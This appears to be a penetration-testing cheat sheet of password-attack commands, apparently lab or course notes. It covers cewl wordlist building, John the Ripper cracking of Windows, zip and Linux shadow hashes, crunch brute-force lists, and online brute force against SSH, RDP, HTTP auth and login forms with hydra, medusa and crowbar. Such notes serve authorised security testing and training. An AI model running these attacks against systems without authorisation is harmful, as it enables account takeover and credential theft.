Password Attacks

cewl - world list generator

cewl -m 6 -w megacorp-cewl.txt # min 6 char words

john - the Ripper

john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

windows hashes:

john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

zip cracking:

zip2john <> > zip.hashes
john zip.hashes

linux hashes:

# first hashes need to be unshadowed
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt 
# and now cracked
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# for a specific user
john --user=root --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

crunch - brute force pwd generator

crunch 8 8 -t ,@@^^%%%

# @ - Lower case alpha characters
# , - Upper case alpha characters
# % - Numeric characters
# ^ - Special characters including space

crunch 4 6 0123456789ABCDEF -o crunch.txt # 4-6 chars password made of combination of the listed characters

medusa - brute force password attack for many network protocols (see option medusa -d)

medusa -h <ip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
# attack on htaccess, admin with folder (url) admin

crowbar - for ssh keys and RDP attacks

# RDP attack with crowbar
crowbar -b rdp -s -u admin -C password-file.txt -n 1

THC-Hydra - multi-protocol attack tool

# ssh attack
hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://

# HTTP post attack
hydra http-form-post
"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P
/usr/share/wordlists/rockyou.txt -vV -f # -vV: verbose output; -f to stop after first successful attempt